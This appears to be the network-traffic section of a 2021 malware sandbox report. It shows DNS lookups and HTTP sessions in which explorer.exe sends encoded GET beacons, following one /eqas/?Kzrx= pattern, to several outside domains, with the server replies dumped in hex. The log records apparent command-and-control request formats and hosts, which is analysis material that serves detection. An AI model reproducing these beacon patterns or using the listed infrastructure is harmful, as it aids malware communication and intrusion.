                                                                Apr 12, 2021 09:46:05.914354086 CEST8.8.8.8192.168.2.60xb9ffServer failure (2)www.360caiyin.comnonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:11.314012051 CEST8.8.8.8192.168.2.60x2afcNo error (0)www.35efb510815e.com34.anxin58.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:46:11.314012051 CEST8.8.8.8192.168.2.60x2afcNo error (0)34.anxin58.com23.225.41.92A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:16.811510086 CEST8.8.8.8192.168.2.60x13eeName error (3)www.nescleanups.comnonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:21.893973112 CEST8.8.8.8192.168.2.60xfeName error (3)www.stripepayment.onlinenonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:27.285378933 CEST8.8.8.8192.168.2.60xa915No error (0)www.beyoncos.com14.129.120.32A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:27.285378933 CEST8.8.8.8192.168.2.60xa915No error (0)www.beyoncos.com14.129.120.31A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:33.364765882 CEST8.8.8.8192.168.2.60x756No error (0)www.mg-izkerr8.net52.79.124.173A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:55.480940104 CEST8.8.8.8192.168.2.60x92afNo error (0)www.mg-izkerr8.net52.79.124.173A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.cjaccessories.net
                                                                • www.sportfest40.com
                                                                • www.kakavjesajt.com
                                                                • www.cursosdigitaisbr.com
                                                                • www.llmav.xyz
                                                                • www.35efb510815e.com
                                                                • www.beyoncos.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.64971923.227.38.7480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:38.229357958 CEST1268OUTGET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cjaccessories.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:38.392312050 CEST1270INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 12 Apr 2021 07:45:38 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                X-Sorting-Hat-PodId: 176
                                                                X-Sorting-Hat-ShopId: 46331166869
                                                                X-Dc: gcp-us-central1
                                                                X-Request-ID: 43a3242b-95f4-408b-8137-67f860923cdc
                                                                Set-Cookie: _shopify_fs=2021-04-12T07%3A45%3A38Z; Expires=Tue, 12-Apr-22 07:45:38 GMT; Domain=cjaccessories.net; Path=/; SameSite=Lax
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                X-Download-Options: noopen
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0966a421d500002c26c3167000000001
                                                                Server: cloudflare
                                                                CF-RAY: 63ead61629122c26-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 33 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e
                                                                Data Ascii: 330<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon
                                                                Apr 12, 2021 09:45:38.392340899 CEST1271INData Raw: 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67
                                                                Data Ascii: t-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6r
                                                                Apr 12, 2021 09:45:38.392357111 CEST1272INData Raw: 31 30 65 64 0d 0a 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72 65 6d 20 32 2e 35 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 3b 74 65 78 74 2d 64 65 63 6f 72
                                                                Data Ascii: 10ed{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width
                                                                Apr 12, 2021 09:45:38.392373085 CEST1273INData Raw: 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 ec 95 a1 ec 84 b8 ec 8a a4 ea b0 80 20 ea b1 b0 eb b6 80 eb 90
                                                                Data Ascii: ara acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "Adgang ngtet", "content-title":
                                                                Apr 12, 2021 09:45:38.392389059 CEST1275INData Raw: 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0 a4 a4 20 e0 a4 95 e0 a4 b0 e0 a4 a8 e0 a5 87 20 e0 a4 95 e0 a5 80 20 e0 a4 85 e0 a4 a8 e0 a5 81 e0 a4 ae e0 a4 a4
                                                                Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                Apr 12, 2021 09:45:38.392401934 CEST1275INData Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20 20 20 69 66 20 28 74 61 72 67 65 74 20 21 3d 20 75 6e 64 65 66 69 6e 65 64 29 20 7b 0a 20 20 20 20 20 20 74 61 72
                                                                Data Ascii: .querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace language tag if (t[language]) { docu
                                                                Apr 12, 2021 09:45:38.392417908 CEST1275INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.649723104.21.28.13580C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:43.519484043 CEST1302OUTGET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.sportfest40.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.649730176.104.107.1880C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:49.271539927 CEST1582OUTGET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.kakavjesajt.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:49.777462006 CEST1597INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:45:49 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.2.22
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8
                                                                Vary: User-Agent
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.649742167.114.6.3180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:55.128757954 CEST2267OUTGET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cursosdigitaisbr.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:55.265363932 CEST2839INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 12 Apr 2021 07:45:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.64974335.244.230.23680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:00.477360964 CEST5382OUTGET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.llmav.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:00.808547020 CEST5386INHTTP/1.1 200 OK
                                                                Server: nginx/1.14.0
                                                                Date: Mon, 12 Apr 2021 07:46:00 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 3584
                                                                Last-Modified: Mon, 12 Apr 2021 03:00:16 GMT
                                                                Vary: Accept-Encoding
                                                                ETag: "6073b7c0-e00"
                                                                Cache-Control: no-cache
                                                                Accept-Ranges: bytes
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 31 39 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6f 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6f 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 6f 2c 65 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 6f 2c 65 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6
                                                                Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.19.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){var o=document.createElement("script");o.src="https://hm.baidu.com/hm.js?"+t;var e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(o,e)}function baiduPush(t,o,e){window._hmt.push(["_trackEvent",t,o,e])}console.log("
                                                                Apr 12, 2021 09:46:00.808581114 CEST5388INData Raw: e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74 20 42 55 49 4c 44 5f 45 4e 56 3d 22 75 63 22 2c 74 6f 6b 65 6e 3d 22 62 31 35 30 64 38 39 35
                                                                Data Ascii: ..."),window._hmt=window._hmt||[];const BUILD_ENV="uc",token="b150d8955dada51289c717fc938583d3";console.log("",token),loadBaiduHmt("uc")</script><script>console.log("UA");
                                                                Apr 12, 2021 09:46:00.808593988 CEST5388INData Raw: 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e
                                                                Data Ascii: pt");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.l
                                                                Apr 12, 2021 09:46:00.811026096 CEST5389INData Raw: 61 73 74 43 68 69 6c 64 29 7d 3b 62 72 65 61 6b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 66 6f 6e 74 53 69 7a 65 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2f 2e
                                                                Data Ascii: astChild)};break}}</script><title></title><script>var fontSize=window.innerWidth/.75;document.querySelector("html").style.fontSize=fontSize+"px",document.title=location.hostname</script><link href="https://image.uc.cn/s/uae/g/3o/berg/static/in


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.64974623.225.41.9280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:11.507055998 CEST5426OUTGET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.35efb510815e.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:11.701028109 CEST5426INHTTP/1.1 302 Moved Temporarily
                                                                Server: openresty/1.19.3.1
                                                                Date: Mon, 12 Apr 2021 07:46:11 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 151
                                                                Connection: close
                                                                Location: https://www.8dq98.com/enter/index.html
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.19.3.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                6192.168.2.64975214.129.120.3280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:27.541057110 CEST5462OUTGET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.beyoncos.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:28.299175024 CEST5471INHTTP/1.1 404 Not Found
                                                                Server: httpv2(13.12)
                                                                Date: Mon, 12 Apr 2021 07:46:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 34 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 63 6f 6c 6f 72 3a 20 23 34 46 35 31 35 35 3b 0a 7d 0a 0a 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 33 33 39 39 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 39 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 0a 63 6f 64 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 75 72 69 65 72 20 4e 65 77 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 32 31 36 36 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 20 31 32 70 78 20 31 30 70 78 3b 0a 7d 0a 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 09 